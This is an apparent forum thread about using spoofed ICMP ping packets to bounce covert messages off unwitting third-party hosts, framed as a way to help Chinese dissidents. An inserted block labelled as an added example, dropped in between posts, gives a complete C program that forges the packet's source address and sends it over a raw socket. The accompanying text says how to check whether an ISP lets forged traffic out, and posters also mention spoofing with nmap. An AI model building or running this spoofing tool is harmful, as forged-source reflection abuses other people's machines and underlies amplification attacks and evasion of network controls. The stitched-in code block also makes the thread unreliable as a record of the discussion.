Using ICMP for anonymous one way communications


Recommended Posts

Guest ash- (Guests)

I've had this idea for a while to use spoofed ICMP packets as a way to transmit data through a proxy (not a socks proxy or any of that garbage). Basically, it would be something like this: You have the IP address of the person you want to send a message to. You craft an ICMP ping packet and spoof the source address to that of the person you wish to send the message to. The destination address is the "proxy". The payload datagram is where your message goes. The proxy picks up the ICMP packet and replies to the source address, relaying your message anonymously.

This could be used for anonymous file transfers or for secret communications (i.e. Chinese dissidents). If anyone knows some C and sockets, then perhaps we could work out something? In order to really test it out, it would take access to two machines. One for sending the spoofed messages and the other for reading them. The proxy can be any machine on the internet that will accept spoofed source IP addresses.

I also had a similar idea that involves the Steam master servers. You could for instance register a fake server and put your own data that you want to send out in place of information like player names on the server, cvars etc. Someone else can search the server list with filters and download this data directly from Steam's servers. This would in effect turn the Steam master servers into a proxy for communications or maybe even simple file transfers.

Link to comment

2 weeks later...

> The payload datagram is where your message goes.

I had a similar idea a couple of years ago for use by the same people - Chinese dissidents. I hadn't thought of the spoofed IP address approach though - just the ICMP payload side. I figured that ICMP was ubiquitous enough that an encrypted message in the payload would go unnoticed - and if noticed, the encryption would be a further deterrent.

One problem I saw with the approach is that not all routers/internet infrastructure/machines route/respond to ICMP. But it is still worth some thought.

I program in C/C++ and have done socket work in vb.net & java – the Windows version shouldn’t be too different.

Perhaps you could explain the spoofing side of things to me a bit more and we could dabble a bit with this.

I’m planning on being in China middle of next year. We might be able to get something to a test state by then? :shrug03:

Link to comment

Guest ash- (Guests)

> Perhaps you could explain the spoofing side of things to me a bit more and we could dabble a bit with this.

First of all, we all know that any computer with ICMP enabled will respond to a simple ping request. Say there are 3 machines with these IPs: 66.30.30.1, 66.30.30.2, 66.30.30.3. I'm on .1 and I want to send a message to .3. I create an ICMP packet and spoof my source address to be 66.30.30.3 and put "hello world" in the datagram (of course, ping sends back the datagram when it replies). I send this packet to .2 and it thinks that I'm really .3 because I spoofed my source address, so it relays the packet to him!

With encryption, it could be impossible to know what kind of communications are taking place. It may be useful for P2P anonymity or numerous things that I haven't thought of yet.

ICMP isn't the only protocol that can be "exploited" in such a manner. The Steam master servers can be used in a similar fashion to relay messages. I'm sure Valve would frown upon this though, so I'm not too optimistic about it. DNS servers may also work as relays.

Link to comment
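The relay described in the post above, as an added example that is not code from this thread or from any of its participants. It builds the IPv4+ICMP echo request the sender on 66.30.30.1 would emit (source forged to the target 66.30.30.3, destination the reflector 66.30.30.2), then models what the reflector does with it (swap addresses, answer with an echo reply, echo the payload) and what the target reads out of the reply. The addresses are the thread's; the message "hello world" and the ICMP identifier are constructed. Only the optional `send_raw()` (root required) touches the network; everything else runs offline.

```c
/* Added example, not code from the thread: a model of the spoofed-ICMP relay.
 * build_spoofed_echo() is the sender, reflect() is any host with ICMP
 * enabled, icmp_payload() is the target reading the relayed message.
 * Addresses are the thread's; "hello world" and id 0x1234 are constructed. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define PKT_MAX 1500
#define IP_HDR 20                     /* IPv4 header without options */
#define ECHO_HDR 8                    /* type, code, checksum, id, seq */
#define PAYLOAD_OFF (IP_HDR + ECHO_HDR)

/* RFC 1071 one's-complement sum over big-endian 16-bit words. Verifying a
 * header that already carries its checksum yields 0. */
static uint16_t cksum(const uint8_t *p, size_t len) {
    uint32_t sum = 0;
    for (; len > 1; p += 2, len -= 2) sum += (uint32_t)(p[0] << 8 | p[1]);
    if (len) sum += (uint32_t)(p[0] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return ntohl(v); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static uint32_t ip_src(const uint8_t *pkt) { return rd32(pkt + 12); }
static uint32_t ip_dst(const uint8_t *pkt) { return rd32(pkt + 16); }
static size_t ip_len(const uint8_t *pkt) { return (size_t)(pkt[2] << 8 | pkt[3]); }
static uint8_t icmp_type(const uint8_t *pkt) { return pkt[IP_HDR]; }

/* Both header checksums must verify and the packet must hold an echo header. */
static int checksums_ok(const uint8_t *pkt) {
    size_t len = ip_len(pkt);
    return len >= PAYLOAD_OFF && cksum(pkt, IP_HDR) == 0 &&
           cksum(pkt + IP_HDR, len - IP_HDR) == 0;
}

/* IPv4 + ICMP echo (type 8 request / 0 reply) + payload, checksums filled in. */
static size_t build_echo(uint8_t *pkt, uint32_t src, uint32_t dst, uint8_t type,
                         uint16_t id, uint16_t seq, const uint8_t *data, size_t dlen) {
    size_t total = PAYLOAD_OFF + dlen;
    if (total > PKT_MAX) return 0;
    memset(pkt, 0, total);
    pkt[0] = 0x45;                        /* version 4, IHL 5 */
    wr16(pkt + 2, (uint16_t)total);       /* total length */
    pkt[8] = 64;                          /* TTL */
    pkt[9] = IPPROTO_ICMP;
    uint32_t s = htonl(src), d = htonl(dst);
    memcpy(pkt + 12, &s, 4);
    memcpy(pkt + 16, &d, 4);
    wr16(pkt + 10, cksum(pkt, IP_HDR));
    uint8_t *icmp = pkt + IP_HDR;
    icmp[0] = type;
    wr16(icmp + 4, id);
    wr16(icmp + 6, seq);
    memcpy(icmp + ECHO_HDR, data, dlen);
    wr16(icmp + 2, cksum(icmp, ECHO_HDR + dlen));
    return total;
}

/* Sender: an echo request whose source field names the target, not us. */
static size_t build_spoofed_echo(uint8_t *pkt, const char *target, const char *reflector,
                                 const uint8_t *msg, size_t mlen) {
    return build_echo(pkt, ntohl(inet_addr(target)), ntohl(inet_addr(reflector)),
                      8, 0x1234, 1, msg, mlen);
}

/* Reflector: answers whoever the source field names and echoes the data back.
 * It never learns the real sender. Returns 0 for anything but a valid request. */
static size_t reflect(const uint8_t *req, uint8_t *reply) {
    if (!checksums_ok(req) || icmp_type(req) != 8) return 0;
    uint16_t id = (uint16_t)(req[24] << 8 | req[25]);
    uint16_t seq = (uint16_t)(req[26] << 8 | req[27]);
    return build_echo(reply, ip_dst(req), ip_src(req), 0, id, seq,
                      req + PAYLOAD_OFF, ip_len(req) - PAYLOAD_OFF);
}

/* Target: recover the relayed message from the echo reply it receives. */
static size_t icmp_payload(const uint8_t *pkt, char *out, size_t outlen) {
    size_t n = ip_len(pkt) >= PAYLOAD_OFF ? ip_len(pkt) - PAYLOAD_OFF : 0;
    if (n >= outlen) n = outlen - 1;
    memcpy(out, pkt + PAYLOAD_OFF, n);
    out[n] = '\0';
    return n;
}

/* Optional: transmit the crafted request. Needs root. IP_HDRINCL makes the
 * kernel send our header, forged source included; an ISP doing egress
 * (BCP 38) source-address filtering drops it at this point. */
static int send_raw(const uint8_t *pkt, size_t len) {
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW), one = 1;
    if (s < 0) return -1;
    setsockopt(s, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
    struct sockaddr_in to = { .sin_family = AF_INET };
    memcpy(&to.sin_addr, pkt + 16, 4);
    ssize_t n = sendto(s, pkt, len, 0, (struct sockaddr *)&to, sizeof to);
    close(s);
    return n == (ssize_t)len ? 0 : -1;
}

int main(int argc, char **argv) {
    static uint8_t req[PKT_MAX], rep[PKT_MAX];
    const char *msg = "hello world";      /* constructed covert message */
    char out[64];
    size_t rlen = build_spoofed_echo(req, "66.30.30.3", "66.30.30.2",
                                     (const uint8_t *)msg, strlen(msg));
    if (!rlen || !reflect(req, rep)) return 1;
    icmp_payload(rep, out, sizeof out);
    struct in_addr to = { .s_addr = htonl(ip_dst(rep)) };
    printf("reflector 66.30.30.2 would reply to %s with \"%s\"\n", inet_ntoa(to), out);
    if (argc > 1 && strcmp(argv[1], "--send") == 0) return send_raw(req, rlen) ? 1 : 0;
    return 0;
}
```

Run without arguments to see the offline model; `--send` (as root) actually emits the forged request, which is exactly the test the thread is after: whether the chosen reflector answers ICMP at all, and whether the sender's own ISP lets a packet with a foreign source address out. On the target side nothing special is needed beyond a sniffer filtering for echo replies addressed to it that it never requested; the payload arrives unchanged, with the reflector's address as source.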

> First of all, we all know that any computer with ICMP enabled will respond to a simple ping request. Say there are 3 machines with these IPs: 66.30.30.1, 66.30.30.2, 66.30.30.3. I'm on .1 and I want to send a message to .3. I create an ICMP packet and spoof my source address to be 66.30.30.3 and put "hello world" in the datagram (of course, ping sends back the datagram when it replies). I send this packet to .2 and it thinks that I'm really .3 because I spoofed my source address, so it relays the packet to him!

Okay, now I get it. You do still have the problem of firewalls that filter out ICMP. I have some friends that manage the network at a small college near where I live - and they filter ALL external ICMP. But it could work if ICMP is allowed to pass. Have you heard of the Great Firewall of China? Their government is using some pretty sophisticated stuff and I don’t know how freely ICMP goes in and out.

The other potential problem I see is the spoofing side. My ISP will drop any traffic that comes from me that claims to be coming from an address other than those they have assigned to me. At least I believe that is the way it works. So I would have a hard time spoofing from my home – and a lot of other people may be in the same boat – yes?

I’m not trying to rain on your parade at all – I really like the idea – I’m just trying to figure out some of the wrinkles before we start banging out code.

Link to comment

Guest ash- (Guests)
(edited)

Yep, I've already considered most of this stuff. I ran some tests with nmap a long time ago and confirmed that SBC (my ISP) will allow spoofed packets. However, I do not know if that is still the case. One thing that worries me is whether or not they have net admins sitting at a console watching ethereal. I'm not a networking guru so I don't know what kind of technology they could use to watch spoofed packets. AFAIK there's nothing illegal about spoofing your IP address. Winsock2 and most variations of *nix allow raw sockets without hassle; nmap is also a well known program that allows easy IP spoofing. In fact, nmap could probably be used as a quick PoC for this idea.

I had some other ideas with ICMP error codes. We could for instance transfer (or relay) messages with a large amount of error codes. With 256 bits being usable for error codes, we could encode/decode it as ASCII. This would require sending a new packet per char though. I have not put as much thought into this idea as the previous one.

EDIT: I think Microsoft disabled raw sockets in one of their updates. Not too sure, but I just remembered something about the nmap authors trying to get a workaround for it.

Edited by ash-
Link to comment

> One thing that worries me is whether or not they have net admins sitting at a console watching ethereal.

:o

The amount of traffic they carry is unreal! I'd find it unlikely that they just blindly monitor packets w/ a sniffer like ethereal.

It is more likely they do some intelligent traffic analysis to try and determine patterns of use that can direct their attention more precisely.

On the other hand I met a lady who used to work for the Chinese government and in her town of 500,000 or so, they employed 25,000 people just listening in on regional phone calls! No lack of labor force for them!

Sounds like you are more of an *ix guy than me – I know just enough to be dangerous there. Most of my experience programming is in the Windows world. Is there a version of nmap for Windows? I’d like to do some tests.

Link to comment
